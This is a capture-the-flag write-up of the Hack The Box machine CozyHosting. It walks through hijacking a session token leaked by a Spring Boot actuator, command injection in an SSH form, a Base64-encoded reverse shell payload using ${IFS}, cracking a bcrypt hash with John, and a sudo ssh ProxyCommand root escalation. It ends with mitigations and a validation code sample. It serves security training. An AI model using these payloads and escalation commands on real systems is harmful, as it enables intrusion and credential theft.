CozyHosting

Platform: Hack The Box

Category/Tags: Linux, Command Injection, Misconfiguration

Difficulty: Easy

Recon

To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.

As usual, I do an nmap scan.

nmap -sC -sV <MACHINE_IP> -oN results.nmap

nmap results
  • Open ports

    • Port 80 - http

    • Port 22 - ssh

The landing page belongs to a hosting solutions company. There is also a login page; I tried some default and common credentials and some basic SQL injections, but no luck.

landing page
login page

I did some directory fuzzing with ffuf; several paths returned status codes 401 (unauthorized), 204 (no content) and 500 (internal server error), so I switched to an alternative tool, dirsearch.

dirsearch -e '*' -u <MACHINE_IP>

Among the results, the Spring Boot Actuator endpoints caught my attention, especially /actuator/sessions.

Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. From Spring Documentation.

actuator endpoints

I visit http://<MACHINE_IP>/actuator/sessions. It shows a session token for the user kanderson that can be used to log in.

auth token

Go to Inspect > Storage > Cookies and change the value of JSESSIONID to the token (a random string) we saw earlier. Gotcha, we have access to the dashboard as K. Anderson.

admin dashboard

Foothold

I explored the dashboard, but none of the components work apart from the connection settings, where we can input a hostname and a username. So I guess this connects to a remote SSH server. I tried a few hostname and username combinations, but I kept getting this error:

ssh connection error

So, I tried to inject Linux commands to see how the web app reacted to the input. I opened Burp Suite, intercepted the request for the SSH connection functionality, and tried some commands. Luckily, it is vulnerable to command injection.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. From OWASP.

burpsuite request and response

We can now get a shell. First, set up a listener:

nc -lnvp 1234

But I ran into a problem: if I supply a command that contains spaces, I get the error Username can't contain whitespaces!

burpsuite response

After some research: we need to Base64-encode the payload and use ${IFS} in place of whitespace.

The Internal Field Separator (IFS) determines how Bash recognizes word boundaries while splitting a sequence of character strings. The default value of IFS is a three-character string comprising a space, tab, and newline. From Baeldung Linux.

This is the crafted payload to be supplied in the username parameter. The Base64 string is the encoded form of the reverse shell command sh -i >& /dev/tcp/<YOUR_IP>/1234 0>&1; the injected command decodes it and pipes the result into bash.

;$(echo${IFS}"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvMTIzNCAwPiYxCg=="|base64${IFS}-d|bash)#

Here it is, we got a shell, running as the user app.

app shell

However, the user app is not the low-privileged user we are after.

/home

In the current directory, I found a JAR file. I transferred it to my local machine to decompile it.

python -m http.server 8000

I then downloaded the JAR file to my local machine and opened it in a Java decompiler. Another thing that caught my attention was the PostgreSQL credentials in classes/application.properties.

application.properties

I connected to the cozyhosting database using psql:

psql -h localhost -U postgres -d cozyhosting

-- show the tables
SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public';

-- query the values in the users table
SELECT * FROM users;

I got the password hash for admin; it looks like a bcrypt hash.

users table

So, as usual, I crack it with John the Ripper.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt <HASH_FILE>

Gotcha! We have the password for admin.

john the ripper

I tried the password for the user admin, but it did not work, so I guessed it is the password for the user Josh.

ssh josh@<MACHINE_IP>

We got the user shell!

user shell

Privilege Escalation

The privilege escalation on this machine is the easiest part.

I run this command to see which commands Josh is allowed to run with sudo.

sudo -l

Based on the output, Josh can run the ssh command with root privileges.

sudo -l

So, I headed to GTFOBins to find a way to use ssh to get root. This command may be used to escalate or maintain privileged access if the user is allowed to run ssh via sudo.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Luckily, I got the root shell.

root shell

Mitigation

  • Validate and sanitize user input to prevent command injection

  • Don’t grant sudo rights over privileged binaries to low-privileged users
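As an added example that is not part of the original write-up, the following Python sketch contrasts the whitespace-only check observed above (the Username can't contain whitespaces! error, which ${IFS} bypasses) with allowlist validation and a shell-free ssh invocation. How the target app actually implemented its check is an assumption, and the sample inputs, including the Base64 placeholder, are constructed.

```python
import re
import subprocess

# Constructed sample inputs (not from the target): a normal username and a
# value shaped like the whitespace-free injection in the write-up. The
# Base64 string is a placeholder that decodes to "payload", not a command.
NORMAL_USER = "kanderson"
INJECTED_USER = ';$(echo${IFS}"cGF5bG9hZA=="|base64${IFS}-d|bash)#'

def denylist_check(username: str) -> bool:
    """Weak check, assumed to be how the app produced the error
    'Username can't contain whitespaces!': it rejects literal whitespace only.
    ${IFS}, ';', '$(...)' and '#' all pass, so a shell still interprets them."""
    return not any(ch.isspace() for ch in username)

# Positive validation instead: a conservative POSIX-style login name, and a
# hostname/IPv4 literal that cannot start with '-' (so it can never be parsed
# as an ssh option such as -oProxyCommand=...).
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

def allowlist_check(username: str) -> bool:
    """Accept only usernames matching the allowlist; reject everything else."""
    return USERNAME_RE.fullmatch(username) is not None

def validate_target(host: str, username: str) -> bool:
    """True only when both fields pass their allowlists."""
    return allowlist_check(username) and HOSTNAME_RE.fullmatch(host) is not None

def build_ssh_argv(host: str, username: str) -> list[str]:
    """Return the ssh invocation as an argument vector. Each element reaches
    execve() as-is, so no shell ever parses the user-controlled values."""
    if not validate_target(host, username):
        raise ValueError("invalid hostname or username")
    # '--' ends option parsing; BatchMode avoids interactive prompts.
    return ["ssh", "-o", "BatchMode=yes", "--", f"{username}@{host}"]

def run_connection_test(host: str, username: str, timeout: int = 5) -> int:
    """Run the connection test with shell=False and return ssh's exit status."""
    argv = build_ssh_argv(host, username)
    return subprocess.run(argv, capture_output=True, timeout=timeout).returncode

if __name__ == "__main__":
    for user in (NORMAL_USER, INJECTED_USER):
        print(f"{user!r}: denylist={denylist_check(user)} allowlist={allowlist_check(user)}")
```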
